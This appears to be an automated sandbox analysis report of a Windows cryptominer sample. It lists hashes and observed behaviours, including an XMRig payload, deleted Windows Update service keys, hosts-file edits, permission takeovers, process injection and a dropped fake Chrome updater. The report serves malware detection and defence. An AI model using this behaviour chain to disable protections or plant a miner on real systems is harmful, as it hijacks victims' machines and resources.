Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-11-2022 19:52

Static task: static1
Behavioral task: behavioral1
Sample: 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Resource: win7-20220812-en

General
Target: 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Size: 2.6MB
MD5: c0827a7bd617a2fcd31a3d751152c2e0
SHA1: 2d58f48e54e1c54e7b63e7ba2c9f50323994242a
SHA256: 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b
SHA512: cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5
SSDEEP: 49152:Y00kMwfXeTG2JpMpukZ6obih7GQtMKc+l3s7RjE+SsZa:YJkduTG2JQdZ6nhYK1cu3
Malware Config
Signatures
- Modifies security service (2 TTPs, 5 IoCs)
  Processes:
    description | ioc | process
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
- Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
  Processes:
    description | pid | process | target process
    PID 4188 created 3280 | 4188 | WerFault.exe | DllHost.exe
    PID 328 created 3388 | 328 | WerFault.exe | DllHost.exe
- Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
  Processes:
    description | pid | process | target process
    PID 3856 created 600 | 3856 | powershell.EXE | winlogon.exe
    PID 524 created 3388 | 524 | svchost.exe | DllHost.exe
    PID 524 created 3280 | 524 | svchost.exe | DllHost.exe
    PID 1708 created 600 | 1708 | powershell.EXE | winlogon.exe
- XMRig Miner payload (2 IoCs)
  Processes:
    resource | yara_rule
    behavioral2/memory/4932-505-0x000000014036EAC4-mapping.dmp | xmrig
    behavioral2/memory/4900-516-0x000000014036EAC4-mapping.dmp | xmrig
- Drops file in Drivers directory (2 IoCs)
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | updater.exe
- Executes dropped EXE (1 IoC)
  Processes:
    pid | process
    4672 | updater.exe
- Possible privilege escalation attempt (4 IoCs)
  Processes:
    pid | process
    1236 | takeown.exe
    1064 | icacls.exe
    3672 | takeown.exe
    4920 | icacls.exe
- Stops running service(s) (3 TTPs)
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes:
    pid | process
    1236 | takeown.exe
    1064 | icacls.exe
    3672 | takeown.exe
    4920 | icacls.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow | ioc
    5 | ip-api.com
- Drops file in System32 directory (18 IoCs)
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
    File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
    File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 | svchost.exe
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE | svchost.exe
    File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
    File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
    File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log | updater.exe
    File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 | svchost.exe
    File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
    File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
- Suspicious use of SetThreadContext (5 IoCs)
  Processes:
    description | pid | process | target process
    PID 4948 set thread context of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 3856 set thread context of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 1708 set thread context of 2320 | 1708 | powershell.EXE | dllhost.exe
    PID 4672 set thread context of 4932 | 4672 | updater.exe | dialer.exe
    PID 4672 set thread context of 4900 | 4672 | updater.exe | dialer.exe
- Drops file in Program Files directory (3 IoCs)
  Processes:
    description | ioc | process
    File created | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
    File opened for modification | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
    File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
- Drops file in Windows directory (4 IoCs)
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
    File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
    File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
    File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
- Launches sc.exe (10 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  Processes:
    pid | process
    4732 | sc.exe
    5024 | sc.exe
    3488 | sc.exe
    3692 | sc.exe
    3948 | sc.exe
    5032 | sc.exe
    3012 | sc.exe
    4872 | sc.exe
    3716 | sc.exe
    2356 | sc.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (2 IoCs)
  Processes:
    pid | pid_target | process | target process
    2076 | 3388 | WerFault.exe | DllHost.exe
    4340 | 3280 | WerFault.exe | DllHost.exe
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
- Enumerates system info in registry (2 TTPs, 4 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | updater.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
- Modifies registry key (1 TTP, 18 IoCs)
  Processes:
    pid | process
    1108 | reg.exe
    1772 | reg.exe
    1156 | reg.exe
    1516 | reg.exe
    328 | reg.exe
    4820 | reg.exe
    2836 | reg.exe
    4632 | reg.exe
    5056 | reg.exe
    1848 | reg.exe
    4160 | reg.exe
    4880 | reg.exe
    5004 | reg.exe
    2780 | reg.exe
    3400 | reg.exe
    2100 | reg.exe
    2156 | reg.exe
    2100 | reg.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
    pid | process
    2020 | powershell.exe
    2020 | powershell.exe
    4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
    4192 | powershell.exe
    3856 | powershell.EXE
    3856 | powershell.EXE
    4192 | powershell.exe
    3856 | powershell.EXE
    2500 | dllhost.exe
    2500 | dllhost.exe
    1708 | powershell.EXE
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2076 | WerFault.exe
    2076 | WerFault.exe
    4340 | WerFault.exe
    4340 | WerFault.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    1708 | powershell.EXE
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    524 | svchost.exe
    524 | svchost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    524 | svchost.exe
    524 | svchost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
    2500 | dllhost.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
    pid | process
    2520 | Explorer.EXE
- Suspicious behavior: LoadsDriver (1 IoC)
  Processes:
    pid | process
    644 | (process name not recorded in the report)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 2020 | powershell.exe
    Token: SeDebugPrivilege | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
    Token: SeShutdownPrivilege | 4380 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 4380 | powercfg.exe
    Token: SeShutdownPrivilege | 3728 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 3728 | powercfg.exe
    Token: SeShutdownPrivilege | 2112 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 2112 | powercfg.exe
    Token: SeShutdownPrivilege | 4492 | powercfg.exe
    Token: SeCreatePagefilePrivilege | 4492 | powercfg.exe
    Token: SeTakeOwnershipPrivilege | 1236 | takeown.exe
    Token: SeDebugPrivilege | 4192 | powershell.exe
    Token: SeDebugPrivilege | 3856 | powershell.EXE
    Token: SeDebugPrivilege | 3856 | powershell.EXE
    Token: SeIncreaseQuotaPrivilege | 4192 | powershell.exe
    Token: SeSecurityPrivilege | 4192 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 4192 | powershell.exe
    Token: SeLoadDriverPrivilege | 4192 | powershell.exe
    Token: SeSystemProfilePrivilege | 4192 | powershell.exe
    Token: SeSystemtimePrivilege | 4192 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 4192 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 4192 | powershell.exe
    Token: SeCreatePagefilePrivilege | 4192 | powershell.exe
    Token: SeBackupPrivilege | 4192 | powershell.exe
    Token: SeRestorePrivilege | 4192 | powershell.exe
    Token: SeShutdownPrivilege | 4192 | powershell.exe
    Token: SeDebugPrivilege | 4192 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 4192 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 4192 | powershell.exe
    Token: SeUndockPrivilege | 4192 | powershell.exe
    Token: SeManageVolumePrivilege | 4192 | powershell.exe
    Token: 33 | 4192 | powershell.exe
    Token: 34 | 4192 | powershell.exe
    Token: 35 | 4192 | powershell.exe
    Token: 36 | 4192 | powershell.exe
    Token: SeDebugPrivilege | 2500 | dllhost.exe
    Token: SeIncreaseQuotaPrivilege | 4192 | powershell.exe
    Token: SeSecurityPrivilege | 4192 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 4192 | powershell.exe
    Token: SeLoadDriverPrivilege | 4192 | powershell.exe
    Token: SeSystemProfilePrivilege | 4192 | powershell.exe
    Token: SeSystemtimePrivilege | 4192 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 4192 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 4192 | powershell.exe
    Token: SeCreatePagefilePrivilege | 4192 | powershell.exe
    Token: SeBackupPrivilege | 4192 | powershell.exe
    Token: SeRestorePrivilege | 4192 | powershell.exe
    Token: SeShutdownPrivilege | 4192 | powershell.exe
    Token: SeDebugPrivilege | 4192 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 4192 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 4192 | powershell.exe
    Token: SeUndockPrivilege | 4192 | powershell.exe
    Token: SeManageVolumePrivilege | 4192 | powershell.exe
    Token: 33 | 4192 | powershell.exe
    Token: 34 | 4192 | powershell.exe
    Token: 35 | 4192 | powershell.exe
    Token: 36 | 4192 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 4192 | powershell.exe
    Token: SeSecurityPrivilege | 4192 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 4192 | powershell.exe
    Token: SeLoadDriverPrivilege | 4192 | powershell.exe
    Token: SeSystemProfilePrivilege | 4192 | powershell.exe
    Token: SeSystemtimePrivilege | 4192 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 4192 | powershell.exe
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes:
    pid | process
    2632 | Conhost.exe
    4168 | Conhost.exe
    2832 | Conhost.exe
    4660 | Conhost.exe
    3924 | Conhost.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
    description | pid | process | target process
    PID 4948 wrote to memory of 2020 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | powershell.exe
    PID 4948 wrote to memory of 2020 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | powershell.exe
    PID 4948 wrote to memory of 212 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | cmd.exe
    PID 4948 wrote to memory of 212 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | cmd.exe
    PID 4948 wrote to memory of 4072 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | cmd.exe
    PID 4948 wrote to memory of 4072 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | cmd.exe
    PID 212 wrote to memory of 3488 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 3488 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 3692 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 3692 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 4732 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 4732 | 212 | cmd.exe | sc.exe
    PID 4072 wrote to memory of 4380 | 4072 | cmd.exe | powercfg.exe
    PID 4072 wrote to memory of 4380 | 4072 | cmd.exe | powercfg.exe
    PID 212 wrote to memory of 3716 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 3716 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 5024 | 212 | cmd.exe | sc.exe
    PID 212 wrote to memory of 5024 | 212 | cmd.exe | sc.exe
    PID 4072 wrote to memory of 3728 | 4072 | cmd.exe | powercfg.exe
    PID 4072 wrote to memory of 3728 | 4072 | cmd.exe | powercfg.exe
    PID 212 wrote to memory of 2836 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 2836 | 212 | cmd.exe | reg.exe
    PID 4072 wrote to memory of 2112 | 4072 | cmd.exe | powercfg.exe
    PID 4072 wrote to memory of 2112 | 4072 | cmd.exe | powercfg.exe
    PID 212 wrote to memory of 2100 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 2100 | 212 | cmd.exe | reg.exe
    PID 4072 wrote to memory of 4492 | 4072 | cmd.exe | powercfg.exe
    PID 4072 wrote to memory of 4492 | 4072 | cmd.exe | powercfg.exe
    PID 212 wrote to memory of 328 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 328 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 4632 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 4632 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 5056 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 5056 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 1236 | 212 | cmd.exe | takeown.exe
    PID 212 wrote to memory of 1236 | 212 | cmd.exe | takeown.exe
    PID 212 wrote to memory of 1064 | 212 | cmd.exe | icacls.exe
    PID 212 wrote to memory of 1064 | 212 | cmd.exe | icacls.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 3060 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | conhost.exe
    PID 4948 wrote to memory of 4192 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | powershell.exe
    PID 4948 wrote to memory of 4192 | 4948 | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe | powershell.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
